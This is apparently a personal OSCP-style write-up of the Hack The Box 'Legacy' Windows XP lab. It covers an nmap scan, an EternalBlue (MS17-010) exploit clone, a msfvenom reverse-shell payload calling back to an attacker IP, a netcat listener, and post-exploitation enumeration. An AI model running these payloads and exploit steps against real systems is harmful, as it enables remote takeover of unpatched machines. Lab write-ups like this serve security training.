HTB - Legacy - HackMD

# HTB - Legacy ###### tags: `OSCP` `Windows` ## Summary - OS: windows xp box - Open ports - netbios (TCP/139, TCP/445) - RDP (TCP/3389) - Steps - Get first foodhold by using `SMB exploit - etrnalblue` - Find we get `NT AUTHORIRY\SYSTEM` - Get the flag ## Run Tests ### NMAP ```nmap= Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 22:51 EST Nmap scan report for legacy (10.10.10.4) Host is up (0.25s latency). Not shown: 997 filtered ports PORT STATE SERVICE 139/tcp open netbios-ssn 445/tcp open microsoft-ds 3389/tcp closed ms-wbt-server Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 Nmap done: 1 IP address (1 host up) scanned in 32.09 seconds ``` ### Get First foothold via MS17-010 vulnerability (**NT AUTHORITY\SYSTEM**) #### Get Exploit code `git clone https://github.com/helviojunior/MS17-010.git` #### Prepare python2 env - install virtualenv package `pip3 install virtualenv` - create python2 virtual environment ```bash= virtualenv -p python2 ms17-010-py2 # activate python2 . ./ms17-010-py2/bin/activate env # install packages pip2 install impacket ``` #### Prepare payload `msfvenom -a x86 --platform windows -f exe -p windows/shell_reverse_tcp LPORT=443 LHOST=10.10.14.29 -o sc_x86_payload.exe` #### Execute Shellcode - attacker listens on 443 `sudo nc -lvnp 443` - run the exploit `python2 MS17-010-ori/send_and_execute.py 10.10.10.4 sc_x86_payload.exe` ### Poke around the victim machine - systeminfo: windows XP ``` Host Name: LEGACY OS Name: Microsoft Windows XP Professional OS Version: 5.1.2600 Service Pack 3 Build 2600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Uniprocessor Free Registered Owner: user Registered Organization: HTB Product ID: 55274-643-7213323-23904 Original Install Date: 16/3/2017, 7:32:23 System Up Time: 0 Days, 0 Hours, 9 Minutes, 36 Seconds System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System type: X86-based PC Processor(s): 1 Processor(s) Installed. [01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~1998 Mhz BIOS Version: INTEL - 6040000 Windows Directory: C:\WINDOWS System Directory: C:\WINDOWS\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk Total Physical Memory: 511 MB Available Physical Memory: 377 MB Virtual Memory: Max Size: 2.048 MB Virtual Memory: Available: 2.005 MB Virtual Memory: In Use: 43 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): 1 Hotfix(s) Installed. [01]: Q147222 NetWork Card(s): 1 NIC(s) Installed. [01]: VMware Accelerated AMD PCNet Adapter Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.4 ``` - net user ``` net user User accounts for \\ ------------------------------------------------------------------------------- Administrator Guest HelpAssistant john SUPPORT_388945a0 The command completed with one or more errors. ``` - get flag - **windows XP: C:\Documents and Settings** (== c:\Users) ```bat cd C:\Documents and Settings\Administrator\Desktop ``` ## Lessions Learned - **windows XP specfic features - user folder locates in `C:\Documents and Settings**` (== c:\Users) - No default `whoami` command - use `echo %USERNAME%` - or copy kali default windows binary `/usr/share/windows-resources/binaries/whoami.exe` to the victim machine ## :star2: Resources - [HTB Walkthrough Legacy without Metasploit #2](https://medium.com/@siddharth.singhal1995/htb-walkthrough-legacy-without-metasploit-2-1baa34ade364) - [HTB: Walkthrough without Metasploit. ~[LEGACY]](https://0xveera.medium.com/htb-walkthrough-without-metasploit-legacy-88347248904a)